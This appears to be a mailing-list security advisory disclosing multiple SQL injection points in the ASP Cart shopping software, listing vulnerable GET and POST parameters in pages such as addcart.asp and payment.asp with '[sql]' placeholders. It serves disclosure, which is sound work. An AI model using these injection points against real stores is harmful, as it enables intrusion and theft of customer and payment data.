<<< Date Index >>>     <<< Thread Index >>>

ASP Cart [multiples injection sql (post & get)]



vendor site: http://www.aspcart.com
product: ASP Cart 
bug: multiples injection sql post & get
global risk: high !

injection get :
http://site.com/prodetails.asp?prodid='[sql]

injection (post) :

1)http://site.com/display.asp 
Variables:
/display.asp?page='[sql]

2)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid='[sql]

3)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item='[sql]

4)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price='[sql]

5)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom='[sql]

6)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department='[sql]

7)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1289&start='[sql]

8)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity='[sql]

9)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity=1&submit='[sql]

10)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity=1&submit=1&custom1='[sql]

11)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity=1&submit=1&custom1=1&custom2='[sql]

12)http://site.com/addcart.asp 
Variables:
/addcart.asp?custid=1&item=prout&price=5666&custom=yes&department=1
289&start=1&quantity=1&submit=1&custom1=1&custom2=1&custom3='[sql]

12)http://site.com/payment.asp 
Variables:
/payment.asp?customerid='[sql]



laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@xxxxxxxxx